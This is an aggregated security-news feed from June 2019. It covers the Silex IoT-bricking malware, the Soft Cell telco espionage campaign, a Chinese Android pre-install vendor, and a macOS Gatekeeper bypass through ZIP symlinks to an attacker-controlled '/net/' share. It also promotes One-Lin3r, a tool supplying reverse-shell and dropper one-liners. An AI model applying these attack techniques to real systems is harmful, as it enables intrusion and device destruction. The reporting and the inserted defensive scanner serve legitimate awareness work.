RSS Security

Today — June 26th 2019

Silex malware bricks thousands of IoT devices in a few hours

Security experts warn of a new piece of the Silex malware that is bricking thousands of IoT devices, and the situation could rapidly get worse.

Akamai researcher Larry Cashdollar discovered a new piece of the Silex malware that is bricking thousands of IoT devices; over 2,000 devices were bricked in a few hours, and the expert is continuing to see new infections.

Cashdollar explained that the Silex malware trashes the storage of the infected devices, drops firewall rules and wipes network configurations before halting the system.

It's trashing the storage, dropping the iptables rules, removing the network configuration and then halting the device. pic.twitter.com/Ue661ku0fy

— Larry W. Cashdollar (@_larry0) June 25, 2019

The only way to recover infected devices is to manually reinstall the device’s firmware.

Silex is not the first IoT malware with this behavior; back in 2017, BrickerBot bricked millions of devices worldwide.

According to ZDNet, which interviewed the malware’s creator, the attacks are about to intensify in the coming days.

“The malware had bricked around 350 devices when this reporter began investigating its operations, and the number quickly spiked to 2,000 wiped devices by the time we published, an hour later.” reported ZDnet.

“Attacks are still ongoing, and according to an interview with the malware’s creator, they are about to intensify in the coming days.”

The researcher Ankit Anubhav was also able to trace the attacker and confirmed that the bot was developed to brick the infected IoT devices.

Traced the attacker who has claimed responsibility and also claiming to brick 361 devices. Will try to interview him. What we speculated is right, this is a bot to cause bricking ( which the attacker says as PDOS, permanent DOS)

There is no financial motive. pic.twitter.com/gUjWCdSIQO

— Ankit Anubhav (@ankit_anubhav) June 25, 2019

Anubhav believes that the Silex malware was developed by a teenager using the online moniker of Light Leafon. The same guy has also created the ITO IoT botnet,

According to Cashdollar, the Silex malware uses a list of known default credentials for IoT devices in the attempt to log in and perform malicious actions. The malware writes random data from /dev/random to any mounted storage it finds.

“I see in the binary it’s calling fdisk -l which will list all disk partitions,” Cashdollar told ZDNet. “It then writes random data from /dev/random to any partitions it discovers.”

The malware also deletes network settings and any other data on the device, then it flushes all iptables entries before halting or rebooting the device.


The IoT malware targets any Unix-like system with default login credentials; according to Cashdollar, it uses a Bash shell version to target any architecture running a Unix-like OS.

The malware could also brick Linux servers that have open Telnet ports and use known credentials.

The IP address (185[.]162[.]235[.]56) behind the attacks observed by the experts is hosted on a VPS owned by novinvps.com, which operates out of Iran.

According to Ankit Anubhav, who spoke with the author of the malware, the developer has definitively abandoned the HITO botnet for Silex and plans to implement other destructive features (SSH hijacking capability, adding exploits to Silex).

At this time, Light’s motivation for these attacks is not clear; let’s hope he will use his talent for legal and good projects.

Pierluigi Paganini

(SecurityAffairs – Silex malware, hacking)

The post Silex malware bricks thousands of IoT devices in a few hours appeared first on Security Affairs.

Operation Soft Cell – Multiple telco firms hacked by nation-state actor

Operation Soft Cell – Experts at Cybereason discovered that China-linked hackers have breached numerous telco providers, taking control of their networks.

Researchers at Cybereason uncovered an ongoing long-running espionage campaign, tracked as Operation Soft Cell, that targets telco providers. Tactics, techniques, and procedures, and the type of targets suggest the involvement of a nation-state actor likely linked to Chinese APT10.

Once they have compromised the network of a telecommunications company, attackers can access mobile phone users’ call data records.

“Based on the data available to us, Operation Soft Cell has been active since at least 2012, though some evidence suggests even earlier activity by the threat actor against telecommunications providers. The attack was aiming to obtain CDR records of a large telecommunications provider.” reads the report published by Cybereason.

“The threat actor was attempting to steal all data stored in the active directory, compromising every single username and password in the organization, along with other personally identifiable information, billing data, call detail records, credentials, email servers, geo-location of users, and more.”


According to Amit Serper, head of security research at Cybereason, attackers exfiltrated gigabytes of data from the target networks, but in relatively small amounts at a time in order to remain under the radar.

Experts explained that the attackers did not exfiltrate the entire archives of the telco companies; instead, they accessed the data by querying the systems from within the target network.

The attack scenario sees the hackers plant a malicious web shell on an IIS server, identified as a modified version of the China Chopper web shell, which was used to run reconnaissance commands, steal credentials, and deploy other hacking tools.

Then attackers launched a series of reconnaissance commands to gather information about the target infrastructure (i.e. machines within the network, network architecture, users, and active directory enumeration).

The hackers also used a modified version of Nbtscan to determine the availability of NetBIOS name servers locally or over the network. The attackers also used multiple Windows built-in tools (i.e. whoami, net.exe, ipconfig, netstat, portqry) and WMI and PowerShell commands.

The threat actors also used Poison Ivy RAT to maintain long-term access across the compromised network, and a modified version of Mimikatz to dump credentials. WMI and PsExec were used by the hackers for lateral movement, while Winrar was used to compress and password-protect stolen data, and a modified version of hTran was used to exfiltrate the data.


Experts believe that hundreds of millions of mobile phone users around the world have been affected, including foreign intelligence agents, politicians and opposition candidates targeted for espionage.

“Beyond targeting individual users, this attack is also alarming because of the threat posed by the control of a telecommunications provider. Telecommunications has become critical infrastructure for the majority of world powers. A threat actor with total access to a telecommunications provider, as is the case here, can attack however they want passively and also actively work to sabotage the network.” concludes the analysis.

“This attack has widespread implications, not just for individuals, but also for organizations and countries alike.”

Pierluigi Paganini

(SecurityAffairs – telco firms, operation soft cell)

The post Operation Soft Cell – Multiple telco firms hacked by nation-state actor appeared first on Security Affairs.

Yesterday — June 25th 2019

Tourmaline - Telegram Bot Framework For Crystal

By: Unknown

Telegram Bot (and hopefully soon Client) API framework for Crystal. Based heavily on Telegraf, this Crystal implementation allows your Telegram bot to be written in a language that's both beautiful and fast. Benchmarks coming soon.
If you want to extend your bot by using NLP, see my other library Cadmium.

Installation
Add this to your application's shard.yml:
dependencies:
  tourmaline:
    github: watzon/tourmaline
    version: ~> 0.7.0

Usage

Basic usage
require "tourmaline/bot"

alias TGBot = Tourmaline::Bot

bot = TGBot::Client.new(ENV["API_KEY"])

bot.command(["start", "help"]) do |message|
  text = "Echo bot is a sample bot created with the Tourmaline bot framework."
  bot.send_message(message.chat.id, text)
end

bot.command("echo") do |message, params|
  text = params.join(" ")
  bot.send_message(message.chat.id, text)
end

bot.poll

Listening for events
Tourmaline has a number of events that you can listen for (the same events as Telegraf, actually). The full list of events can be found in the documentation.
bot.on(:text) do |update|
  text = update.message.not_nil!.text.not_nil!
  puts "TEXT: #{text}"
end

Adding middleware
Middleware can be created by extending the Tourmaline::Bot::Middleware class. All middleware classes need to have a call(update : Update) method. The middleware will be called on every update.
class MyMiddleware < TGBot::Middleware

  # All middleware include a reference to the parent bot.
  # @bot : Tourmaline::Bot::Client

  def call(update : Update)
    if message = update.message
      if user = message.from_user
        if text = message.text
          puts "#{user.first_name}: #{text}"
        end
      end
    end
  end

end

bot.use MyMiddleware

Webhooks
Using webhooks is easy, even locally if you use the ngrok.cr package.
# bot.poll

bot.set_webhook("https://example.com/bots/my_tg_bot")
bot.serve("0.0.0.0", 3400)

# or with ngrok.cr

require "ngrok"

Ngrok.start({ addr: "127.0.0.1:3400" }) do |ngrok|
  bot.set_webhook(ngrok.ngrok_url_https)
  bot.serve("127.0.0.1", 3400)
end

Payments
You can now accept payments with your Tourmaline app! First make sure you follow the setup instructions here so that your bot is prepared to handle payments. Then just use the send_invoice, answer_shipping_query, and answer_pre_checkout_query methods to send invoices and accept payments.
bot.command("buy") do |message, params|
  bot.send_invoice(
    message.chat.id,
    "Sample Invoice",
    "This is a test...",
    "123344232323",
    "YOUR_PROVIDER_TOKEN",
    "test1",
    "USD",
    bot.labeled_prices([{label: "Sample", amount: 299}, {label: "Another", amount: 369}]).to_json
  )
end

Games
The ability to create and run games with your Tourmaline bot is a recent feature that hasn't been tested yet. Please use the issue tracker if you experience problems.

Kemal Middleware
Tourmaline provides middleware for Kemal, just in case you want to use Kemal as the server.
require "kemal"
require "tourmaline/kemal/tourmaline_handler"

require "./your_bot"

add_handler Kemal::TourmalineHandler.new(
  bot: YourBot.new,
  url: "https://something.com",
  path: "/bot-webhook/#{ENV["TGBOT_API_KEY"]}"
)

Kemal.run
Note: Telegram won't send webhook requests to non-SSL domains. This means that you need to run your Kemal server with SSL enabled. For local development this can be a pain, but it is made much easier with ngrok.cr.

Development
This currently supports the following features:
  • Bot API
    • Implementation examples
    • Easy command syntax
    • Robust middleware system
    • Standard API queries
    • Stickers
    • Inline mode
    • Long polling
    • Webhooks
    • Payments
    • Games
  • Client API (in development)
If you want a new feature feel free to submit an issue or open a pull request.

Contributing
  1. Fork it ( https://github.com/watzon/tourmaline/fork )
  2. Create your feature branch (git checkout -b my-new-feature)
  3. Commit your changes (git commit -am 'Add some feature')
  4. Push to the branch (git push origin my-new-feature)
  5. Create a new Pull Request

Contributors
  • watzon Chris Watson - creator, maintainer


Tracing the Supply Chain Attack on Android

Earlier this month, Google disclosed that a supply chain attack by one of its vendors resulted in malicious software being pre-installed on millions of new budget Android devices. Google didn’t exactly name those responsible, but said it believes the offending vendor uses the nicknames “Yehuo” or “Blazefire.” What follows is a deep dive into the identity of that Chinese vendor, which appears to have a long and storied history of pushing the envelope on mobile malware.

“Yehuo” is Mandarin for “wildfire,” so one might be forgiven for concluding that Google was perhaps using another dictionary than most Mandarin speakers. But Google was probably just being coy: The vendor in question appears to have used both “blazefire” and “wildfire” in two of many corporate names adopted for the same entity.

An online search for the term “yehuo” reveals an account on the Chinese Software Developer Network which uses that same nickname and references the domain blazefire[.]com. More searching points to a Yehuo user on gamerbbs[.]cn who advertises a mobile game called “Xiaojun Junji,” and says the game is available at blazefire[.]com.

Research on blazefire[.]com via Domaintools.com shows the domain was assigned in 2015 to a company called “Shanghai Blazefire Network Technology Co. Ltd.” just a short time after it was registered by someone using the email address “tosaka1027@gmail.com”.

The Shanghai Blazefire Network is part of a group of similarly-named Chinese entities in the “mobile phone pre-installation business and in marketing for advertisers’ products to install services through mobile phone installed software.”

“At present, pre-installed partners cover the entire mobile phone industry chain, including mobile phone chip manufacturers, mobile phone design companies, mobile phone brand manufacturers, mobile phone agents, mobile terminal stores and major e-commerce platforms,” reads a descriptive blurb about the company.

A historic records search at Domaintools on that tosaka1027@gmail.com address says it was used to register 24 Internet domain names, including at least seven that have been conclusively tied to the spread of powerful Android mobile malware.

Two of those domains registered to tosaka1027@gmail.com — elsyzsmc[.]com and rurimeter[.]com — were implicated in propagating the Triada malware. Triada is the very same malicious software Google said was found pre-installed on many of its devices and being used to install spam apps that display ads.

In July 2017, Russian antivirus vendor Dr.Web published research showing that Triada had been installed by default on at least four low-cost Android models. In 2018, Dr.Web expanded its research when it discovered the Triada malware installed on 40 different models of Android devices.

At least another five of the domains registered to tosaka1027@gmail.com — 99youx[.]com, buydudu[.]com, kelisrim[.]com, opnixi[.]com and sonyba[.]com — were seen as early as 2016 as distribution points for the Hummer Trojan, a potent strain of Android malware often bundled with games that completely compromises the infected device.

A records search at Domaintools for “Shanghai Blazefire Network Technology Co” returns 11 domains, including blazefire[.]net, which is registered to a yehuo@blazefire.net. For the remainder of this post, we’ll focus on the bolded domain names below:

Domain Name            Create Date   Registrar
2333youxi[.]com        2016-02-18    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
52gzone[.]com          2012-11-26    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
91gzonep[.]com         2012-11-26    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]com        2000-08-24    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]net        2010-11-22    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
hsuheng[.]com          2015-03-09    GODADDY.COM, LLC
jyhxz.net              2013-07-02    —
longmen[.]com          1998-06-19    GODADDY.COM, LLC
longmenbiaoju[.]com    2012-12-09    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
oppayment[.]com        2013-10-09    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
tongjue[.]net          2014-01-20    ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD

Following the breadcrumbs from some of the above domains we can see that “Blazefire” is a sprawling entity with multiple business units and names. For example, 2333youxi[.]com is the domain name for Shanghai Qianyou Network Technology Co., Ltd., a firm that says it is “dedicated to the development and operation of Internet mobile games.”

Like the domain blazefire[.]com, 2333youxi[.]com also was initially registered to tosaka1027@gmail.com and soon changed to Shanghai Blazefire as the owner.

The offices of Shanghai Qianyou Network — at Room 344, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai, China — are just down the hall from Shanghai Wildfire Network Technology Co., Ltd., reportedly at Room 35, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai.

The domain tongjue[.]net is the Web site for Shanghai Bronze Network Technology Co., Ltd., which appears to be either another name for or a sister company to Shanghai Tongjue Network Technology Co., Ltd. According to its marketing literature, Shanghai Tongjue is situated one door down from the above-mentioned Shanghai Qianyou Network — at Room 36, 6th Floor, Building 10, No. 196, Ouyang Road.

“It has developed into a large domestic wireless Internet network application,” reads a help wanted ad published by Tongjue in 2016. “The company is mainly engaged in mobile phone pre-installation business.”

That particular help wanted ad was for a “client software development” role at Tongjue. The ad said the ideal candidate for the position would have experience with “Windows Trojan, Virus or Game Plug-ins.” Among the responsibilities for this position were:

- Crack the restrictions imposed by the manufacturer on the mobile phone.
- Research and master the android [operating] system
- Reverse the root software to study the root of the android mobile phone
- Research the anti-brushing and provide anti-reverse brushing scheme

WHO IS BLAZEFIRE/YEHUO?

Many of the domains mentioned above have somewhere in their registration history the name “Hsu Heng” and the email address yehuo@blazefire.net. Based on an analysis via cyber intelligence firm 4iq.com of passwords and email addresses exposed in multiple data breaches in years past, the head of Blazefire goes by the nickname “Hagen” or “Haagen” and uses the email “chuda@blazefire.net”.

Searching on the phrase “chuda” in Mandarin turns up a 2016 story at the Chinese gaming industry news site Youxiguancha.com that features numerous photos of Blazefire employees and their offices. That story also refers to the co-founder and CEO of Blazefire variously as “Chuda” and “Chu da”.

“Wildfire CEO Chuda is a tear-resistant boss with both sports (Barcelona hardcore fans) and literary genre (playing a good guitar),” the story gushes. “With the performance of leading the wildfire team and the wildfire product line in 2015, Chu has won the top ten new CEO awards from the first Black Rock Award of the Hardcore Alliance.”

Interestingly, the registrant name “Chu Da” shows up in the historical domain name records for longmen[.]com, perhaps Shanghai Wildfire’s oldest and most successful mobile game ever. That record, from April 2015, lists Chu Da’s email address as yehuo@blazefire.com.

The CEO of Wildfire/Blazefire, referred to only as “Chuda” or “Hagen.”

It’s not clear if Chuda is all or part of the CEO’s real name, or just a nickname; the vice president of the company lists their name simply as “Hua Wei,” which could be a real name or a pseudonymous nod to the embattled Chinese telecom giant by the same name.

According to this cached document from Chinese business lookup service TianYanCha.com, Chuda also is a senior executive at six other companies.

Google declined to elaborate on its blog post. Shanghai Wildfire did not respond to multiple requests for comment.

It’s perhaps worth noting that while Google may be wise to what’s cooking over at Shanghai Blazefire/Wildfire Network Technology Co., Apple still has several of the company’s apps available for download from the iTunes store, as well as others from Shanghai Qianyou Network Technology.

OSX/Linker, a new piece of Mac malware that exploits Gatekeeper bypass

Mac security software firm Intego has spotted a new Mac malware dubbed OSX/Linker that exploits a recently disclosed macOS Gatekeeper vulnerability.

Experts at Mac security software firm Intego discovered a new piece of Mac malware dubbed OSX/Linker that exploits a recently disclosed macOS Gatekeeper bypass vulnerability.

Apple’s Gatekeeper is designed to protect macOS users by performing a number of checks before allowing an app to run: it will not let you execute code that wasn’t signed by an Apple developer, nor run apps that weren’t downloaded from Apple’s store, unless the device has been jailbroken, of course.

Researchers speculate that the Linker malware has the same authors as the OSX/Surfbuyer adware.

In late May, the Italian security researcher Filippo Cavallarin demonstrated how to bypass the macOS Gatekeeper by leveraging trust in network shares.

Cavallarin demonstrated how to bypass Gatekeeper and execute untrusted code without the user’s explicit permission and without any warning to the victim.

Gatekeeper considers both external drives and network shares to be safe locations; this means that any application in these locations can run without asking for the user’s consent.

In late May, security researcher Filippo Cavallarin disclosed a bug in Gatekeeper that would allow a malicious binary downloaded from the Internet to bypass the Gatekeeper scanning process.

The attacker would need to leverage two legitimate features implemented in macOS: automount (aka autofs) and the lack of specific checks on symbolic links inside ZIP archives.

The autofs feature allows a user to automatically mount a network share by accessing a “special” path, in this specific case any path beginning with “/net/” (i.e. /net/evil-attacker.com/sharedfolder/).

The second feature that was exploited is the ability to include, within ZIP archives, symbolic links pointing to arbitrary locations, in this case automount endpoints.

Cavallarin discovered that the software responsible for decompressing the ZIP archives does not perform any check on the symlinks.

An attacker can create a ZIP file containing a symbolic link to an automount endpoint under their control and send it to the victim. In the attack scenario, the victim downloads the archive and follows the symlink, and is redirected to the location controlled by the attacker, which is also trusted by Gatekeeper.
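A defender-side check for the archive trick described above, added here as an example that is not from the post, from Cavallarin or from Intego: it lists the symlink entries of a ZIP and flags any whose target resolves under the /net/ automount prefix (and, more weakly, any symlink that escapes the archive). The sample archive, its member names and the target host are constructed; it does not reproduce the macOS Archive Utility behaviour, only the inspection a mail gateway or download scanner could do.

```python
import io
import posixpath
import stat
import zipfile
from typing import List, Tuple

# Assumption: the automount prefix named in the post. Add others if your
# fleet exposes further autofs maps.
AUTOMOUNT_PREFIXES = ("/net/",)


def zip_symlinks(data: bytes) -> List[Tuple[str, str]]:
    """Return (member_name, link_target) for every symlink entry in a ZIP.

    The Unix mode of a member lives in the high 16 bits of external_attr;
    a symlink's "content" in the archive is simply its target path.
    """
    links = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if stat.S_ISLNK(mode):
                target = zf.read(info).decode("utf-8", errors="replace")
                links.append((info.filename, target))
    return links


def scan_zip(data: bytes) -> List[Tuple[str, str, str]]:
    """Classify each symlink: automount target, archive escape, or ignored.

    Targets are normalised first so that "/net//host/../x" style paths are
    judged by where they actually resolve.
    """
    findings = []
    for name, target in zip_symlinks(data):
        norm = posixpath.normpath(target)
        if norm.startswith(AUTOMOUNT_PREFIXES):
            findings.append((name, target, "automount target"))
        elif norm.startswith("/") or norm.startswith(".."):
            findings.append((name, target, "escapes archive"))
    return findings


def build_zip(entries) -> bytes:
    """Constructed test input: entries are (name, content, is_symlink)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content, is_link in entries:
            zi = zipfile.ZipInfo(name)
            mode = (stat.S_IFLNK | 0o777) if is_link else (stat.S_IFREG | 0o644)
            zi.external_attr = mode << 16
            zf.writestr(zi, content)
    return buf.getvalue()


# Constructed samples (hypothetical names and host, not real indicators).
BENIGN = build_zip([("readme.txt", "hello", False),
                    ("docs", "./readme.txt", True)])
SAMPLE = build_zip([
    ("readme.txt", "hello", False),
    ("Open Me.app", "/net/example.invalid/share/App.app", True),
    ("notes", "../../etc/hosts", True),
])

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("sample", SAMPLE)):
        for name, target, reason in scan_zip(blob):
            print(f"{label}: {name} -> {target} [{reason}]")
```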

Below is a video PoC of the attack:

The Gatekeeper bypass flaw affects all macOS versions, including the latest one (ver. 10.14.5), and Apple has yet to release an update to address the issue.

Cavallarin reported the vulnerability to Apple on February 22, but Apple missed the 90-day deadline and is no longer responding to the expert’s emails.

Unfortunately, malware authors (vxers) are already working on including the exploit code in their malware. Intego experts have already analyzed some malware samples that appear to be a sort of test of the Gatekeeper bypass exploit.

The disk image files were either an ISO 9660 image with a .dmg file name, or an actual Apple Disk Image format .dmg file.

“Intego observed four samples that were uploaded to VirusTotal on June 6, seemingly within hours of the creation of each disk image, that all linked to one particular application on an Internet-accessible NFS server.” reads the analysis published by Intego.

“Each of the four files were uploaded anonymously, meaning the user was not signed into a VirusTotal account.”

All the OSX/Linker malware samples analyzed by the experts were disguised as Adobe Flash Player installers, a circumstance that suggests they were actual malware payload testing.

At the time of writing, OSX/Linker malware samples haven’t been observed in the wild yet.

Intego notified Apple that the OSX/Surfbuyer adware gang was abusing an Apple Developer ID to sign their malicious OSX/Linker samples, so that the tech giant could revoke the abused certificate.

Pierluigi Paganini

(SecurityAffairs – OSX/Linker, malware)

The post OSX/Linker, a new piece of Mac malware that exploits Gatekeeper bypass appeared first on Security Affairs.

Penetration tester resume tips

Introduction Resumes are the window that organizations use to see what candidates have to offer and are used to filter all who interview for job positions. You can also think of resumes as the face of your career up to this point: it should show an organization what you can do for them from just […]

The post Penetration tester resume tips appeared first on Infosec Resources.


Penetration tester resume tips was first posted on June 25, 2019 at 8:02 am.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com

Penetration tester salary

Introduction For some, aiming for one of the most glamorous or cool jobs is their cup of tea, and for many in information security their equivalent role is penetration tester. Much like an action movie in the vein of “Mission Impossible,” you’ll get to hack into computer systems for a legitimate purpose.  The question then […]

The post Penetration tester salary appeared first on Infosec Resources.


Penetration tester salary was first posted on June 25, 2019 at 8:01 am.

Penetration tester career path

Introduction Are you interested in a career as penetration tester? If you have “a thorough understanding of pentesting methodologies and vulnerability assessments, as well as the ability to exploit systems and effectively communicate findings,” then this might be the right field for you. How does an IT professional become a penetration tester? There is no […]

The post Penetration tester career path appeared first on Infosec Resources.


Penetration tester career path was first posted on June 25, 2019 at 8:00 am.

One-Lin3r v2.0 - Gives You One-Liners That Aids In Penetration Testing Operations, Privilege Escalation And More

By: Zion3R

One-Lin3r is a simple, modular and lightweight framework that gives you all the one-liners you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking in general, with many new features to make all of this fully automated (e.g. you won't even need to copy the one-liners).


It consists of various one-liner types with various functions, some of them are:
One-liner function    What this function refers to
-------------------   ----------------------------
Reverse Shell         Various methods and commands to give you a reverse shell.
PrivEsc               Many commands to help in enumeration and privilege escalation.
Bind Shell            Various methods and commands to give you a bind shell.
Dropper               Many ways to download and execute various payload types with various methods.

Features
  • A lot of liners for different purposes; currently there are more than 155 liners.
  • The auto-complete feature implemented in this framework is not the usual one you always see, here are some highlights:
    • It's designed to fix typos in typed commands to the most similar command with just one tab click, so seach becomes search and so on, even if you typed any random word similar to a command in this framework.
    • For the lazy ones out there like me, it can predict which liner you are trying to use by typing any part of it. For example, if you typed use capabilities and pressed tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, you are welcome!
    • If you typed a wrong command and then pressed enter, the framework will tell you the nearest command to what you typed, which could be the one you really wanted.
    • Some less impressive things like auto-complete for variables after the set command, auto-complete for liners after the use and info commands, and finally it converts all uppercase to lowercase automatically, just in case you switched case by mistake while typing.
    • Finally, you'll find the normal auto-completion things you were using before, like command auto-completion and persistent history, etc.
  • Automation
    • You can automatically copy the liner you want to the clipboard with the command copy <liner> instead of using use <liner> and then copying it, which saves a lot of time, of course, if you combine it with the following features.
    • As you may have noticed, you can use a resource file from command-line arguments before starting the framework itself or send commands directly.
    • Inside the framework you can use the makerc command like in Metasploit, but this time it only saves the correct, important commands.
    • There are history and resource commands so you don't need to exit the framework.
    • You can execute as many commands as you want at the same time by splitting them with a semicolon.
    • Searching for any liner here is easy: you can search for a liner by its name, function or even the liner author's name.
  • You can add your own liners by following these steps to create a liner as a Python file. After that you can make a pull request with it, and it will be added to the framework and credited with your name, of course.
  • The ability to reload the database if you added any liner, without restarting the framework.
  • You can add any platform to the liners database just by making a folder in the liners folder and creating a ".liner" file there.
  • More...
Note: The liners database is not too big, but it will get bigger with updates and contributions.

Usage

Command-line arguments
usage: one-lin3r [-h] [-r R] [-x X] [-q]

optional arguments:
-h, --help show this help message and exit
-r Execute a resource file (history file).
-x Execute a specific command (use ; for multiples).
-q Quiet mode (no banner).

Framework commands
Command                  Description
----------------------   -----------
help/?                   Show this help menu.
list/show                List all one-liners in the database.
search [Keywords..]      Search the database for a specific liner by its name, author name or description.
use <liner>              Use an available one-liner.
copy <liner>             Use an available one-liner and copy it to the clipboard automatically.
info <liner>             Get information about an available liner.
set <variable> <value>   Set a context-specific variable to a value to use while using one-liners.
variables                Print all previously specified variables.
banner                   Display the banner.
reload/refresh           Reload the liners database.
check                    Print the core version and check whether you are up to date.
history                  Display the most important command-line history from the beginning.
makerc                   Save command-line history to a file.
resource <file>          Run the commands stored in a file.
os <command>             Execute a system command without closing the framework.
exit/quit                Exit the framework.

Prerequisites before installing
  • Python 3.x.
  • Any OS; it should work on all, but it's tested on Kali 2018+, Ubuntu 18+, Windows 10, Android with Termux and macOS 10.11.

Installing and running
  • Using pip (The best way to install on any OS):
pip install one-lin3r
one-lin3r -h
  • Installing it from GitHub:
    • For Windows (after downloading the ZIP and unzipping it):
    python -m pip install ./One-Lin3r-master
    one-lin3r -h
    • For Linux :
    git clone https://github.com/D4Vinci/One-Lin3r.git
    apt install libncurses5-dev
    pip3 install ./One-Lin3r
    one-lin3r -h

Updating the framework or the database
  • If you installed it from pip do:
pip install one-lin3r --upgrade
  • If you installed it from github do:
    • On Linux while outside the directory
    cd One-Lin3r && git pull && cd ..
    pip3 install ./One-Lin3r --upgrade
    • On Windows if you don't have git installed, redownload the framework zipped!
Note: Since the liners are written as Python modules, they are considered part of the framework, so every new liner added to the framework also bumps its version.

Anonymous Belgium hacker identified after dropping USB drive while throwing Molotov cocktail

Belgium police have identified a member of the Anonymous Belgium collective while investigating an arson case at a local bank.

The Anonymous member, a 35-year-old man from Roeselare, Belgium, was arrested after throwing a Molotov cocktail at the Crelan Bank office in Rumbeke back in 2014.

According to ZDnet, the hacker was exposed after dropping a USB drive on the ground while throwing the Molotov cocktail.

The analysis of the USB drive's content allowed the authorities to identify the man. Court documents refer to the hacktivist as Brecht S.; the police raided his house and examined his computer and electronic devices, revealing a long history of cybercrime activity.

Anonymous Belgium

The member of Anonymous was also involved in DDoS attacks against the online banking system of Crelan Bank that shut down the portal on numerous occasions.

Brecht explained that he attacked the bank because its officials refused to meet with him following the disappearance of €300,000 from his mother's bank account after her divorce from his father. The attack was revenge for what had happened to his mother.

The man also stated that he was experiencing a difficult period at the time and was involved in drugs.

According to the prosecutors, the man is an active member of the Anonymous Belgium and Cyber Crew hacking groups and was involved in numerous operations of the collectives, including one aimed at FIFA, the international soccer/football federation.

Brecht also blackmailed some organizations by threatening them with DDoS attacks; in one case the victim was a restaurant. The hacker took the restaurant's website down several times with DDoS attacks and demanded a ransom payment to halt the attacks.

The police also identified a co-conspirator, a 44-year-old man from Bruges. The hacker was also a member of a cyber criminal gang and had exchanged hacking tools with Brecht.

Brecht S. had already been sentenced to three years in prison for throwing the Molotov cocktail; along with the other defendant he was also fined 1,200 euros.

“A 35-year-old man from Roeselare has been sentenced to eighteen months in prison because he hacked the website of Crelan and took it offline for hours.” reported the Belgian news site Het Laatste Nieuws. “Crelan received three thousand euros in compensation. The defendant also extorted a pizzeria by laying down the website and asking for ransom. Another hacker from Bruges was fined 1,200 euros.”

HLN reported that Brecht received an 18 months prison sentence for cybercrimes he committed and was ordered to pay €3,000 to Crelan Bank as compensation for damages caused by the DDoS attacks.

Brecht’s co-conspirator has not been sentenced to prison.

Pierluigi Paganini

(SecurityAffairs – Anonymous, hacktivism)

The post Anonymous Belgium hacker identified after dropping USB drive while throwing Molotov cocktail appeared first on Security Affairs.

New Mac Malware Exploits GateKeeper Bypass Bug that Apple Left Unpatched

Cybersecurity researchers from Intego are warning about possible active exploitation of an unpatched security vulnerability in Apple's macOS Gatekeeper security feature, details and a PoC for which were publicly disclosed late last month. The Intego team last week discovered four samples of new macOS malware on VirusTotal that leverage the GateKeeper bypass vulnerability to execute untrusted code on

Iran denies attack against its infrastructure has ever succeeded

After media reported a cyber offensive launched by the US against Iran, Tehran announced that no alleged cyber attack against its infrastructure has ever succeeded.

Last week, media reported that the United States has launched a series of cyber attacks on Iran after the Iranian military has downed an American surveillance drone.

US President Donald Trump first approved military strikes against Iran in retaliation for downing a surveillance drone, but pulled back from launching them on Thursday night after a day of escalating tensions.

Tensions between Iran and the US have been increasing since President Trump blamed Iran for the attacks on oil tankers traveling through the Strait of Hormuz, an accusation Iran immediately denied. Trump decided to temporarily suspend the military strikes to attempt negotiation and push for new sanctions against Iran, but at the same time he secretly authorized US Cyber Command to carry out a retaliatory cyber attack on Iran.

US hit IRAN

Now Tehran has replied to the news reported by the media, stating that no cyber attack against its infrastructure has ever succeeded.

“The media are asking about the veracity of the alleged cyber attack against Iran. No successful attack has been carried out by them, although they are making a lot of effort,” ICT Minister of Iran Mohammad Javad Azari Jahromi said on Twitter.

The Iranian telecommunications minister labeled the activity against its state as “cyber terrorism — such as Stuxnet — and unilateralism — such as sanctions”.

"The media are asking about the veracity of the alleged cyber attack against Iran. No successful attack has been carried out by them…" – telecommunications minister Mohammad Javad Azari Jahromi. https://t.co/fzEEap8OfR

— Al Jazeera News (@AJENews) June 24, 2019

US media on Saturday said Washington launched cyber attacks against Iranian missile control systems and a spy network this week after Tehran downed an American surveillance drone.

“President Trump approved an offensive cyberstrike that disabled Iranian computer systems used to control rocket and missile launches, even as he backed away from a conventional military attack in response to its downing Thursday of an unmanned U.S. surveillance drone, according to people familiar with the matter.” reported The Washington Post.

“The cyberstrikes, launched Thursday night by personnel with U.S. Cyber Command, were in the works for weeks if not months, according to two of these people, who said the Pentagon proposed launching them after Iran’s alleged attacks on two oil tankers in the Gulf of Oman earlier this month.”

The cyber attacks carried out by US Cyber Command aimed at disabling the computer systems that control rocket and missile launches.

According to Yahoo, two former intelligence officials confirmed that the cyber attacks also hit a spying group responsible for tracking ships in the strategic Strait of Hormuz.

This isn’t the first time the US has opted for a cyber attack to hit Iran: the Stuxnet virus, first uncovered in 2010, was used to sabotage nuclear facilities in Iran from at least 2005.

Since the Stuxnet attack, Iran-linked APT groups have increased their cyber capabilities and have intensified their activities against entities worldwide.

“We foiled last year not one attack but 33 million attacks with Dejpha shield,” declared Azari Jahromi referring to a cyber defence system.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Iran denies attack against its infrastructure has ever succeeded appeared first on Security Affairs.

SocialEngineered forum hacked and data leaked online

SocialEngineered.net, a forum dedicated to social engineering discussions, has been compromised and the data of its users was leaked on a hacker forum.

SocialEngineered.net, the forum dedicated to social engineering topics, announced it has suffered a data breach two weeks ago.

Hackers accessed data from tens of thousands of members and leaked them online on a hacker forum.

The hackers exploited a vulnerability in the MyBB forum to access forum data.

